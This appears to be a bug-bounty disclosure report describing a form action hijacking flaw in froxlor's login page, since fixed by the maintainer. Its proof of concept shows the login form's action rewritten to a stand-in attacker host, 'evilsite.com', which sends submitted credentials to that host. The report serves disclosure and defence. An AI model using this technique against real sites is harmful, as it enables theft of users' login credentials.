External Control of File Name or Path in froxlor/froxlor


Reported on

Aug 25th 2021

✍️ Description

The login form POST request can be hijacked so that the credentials will be sent to an external website, by modifying the login page URL.

🕵️‍♂️ Proof of Concept

Change the login page URL to


Then the form action in the webpage will be changed to

<section class="loginsec">
            <form method="post" action="evilsite.com" enctype="application/x-www-form-urlencoded">
                <input type="hidden" name="script" value="" />
                <input type="hidden" name="qrystr" value="" />

💥 Impact

Form action hijacking vulnerabilities arise when an application places user-supplied input into the action URL of an HTML form. An attacker can use this vulnerability to construct a URL that, if visited by another application user, will modify the action URL of a form to point to the attacker's server. If a user submits the form then its contents, including any input from the victim user, will be delivered directly to the attacker.


We have contacted a member of the froxlor team and are waiting to hear back 2 years ago
froxlor/froxlor maintainer marked this as fixed with commit 5d375b 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation